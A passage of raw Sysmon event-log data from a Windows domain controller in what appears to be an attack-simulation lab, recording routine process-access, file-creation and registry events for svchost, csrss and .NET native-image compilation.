\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007522Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:39.636{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007521Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:39.636{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007520Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:39.636{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007519Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:39.636{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007518Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:39.636{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007517Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:39.636{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007516Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:39.636{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007515Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:39.636{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007514Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:39.636{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007513Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:39.636{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007512Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:39.636{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007511Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:39.636{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007510Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:39.636{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007509Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:39.636{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000007508Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:49:39.620{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6eda0-0xc4328f26) 11241100x80000000000000007528Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:40.526{59A5CD1D-91EA-6005-3A03-00000000A301}4856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\12f8-0\PresentationFramework.dll2021-01-18 13:49:40.526 10341000x80000000000000007538Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:41.573{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91F5-6005-3D03-00000000A301}2592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007537Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:41.557{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91F5-6005-3D03-00000000A301}2592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007536Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:41.557{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91F5-6005-3D03-00000000A301}2592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007535Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:41.495{59A5CD1D-91F5-6005-3C03-00000000A301}4436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1154-0\PresentationFramework.Aero2.dll2021-01-18 13:49:41.495 10341000x80000000000000007534Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:41.167{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91F5-6005-3C03-00000000A301}4436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007533Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:41.167{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91F5-6005-3C03-00000000A301}4436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007532Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:41.167{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91F5-6005-3C03-00000000A301}4436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007531Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:41.058{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91F5-6005-3B03-00000000A301}2532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007530Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:41.042{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91F5-6005-3B03-00000000A301}2532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007529Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:41.042{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91F5-6005-3B03-00000000A301}2532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007541Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 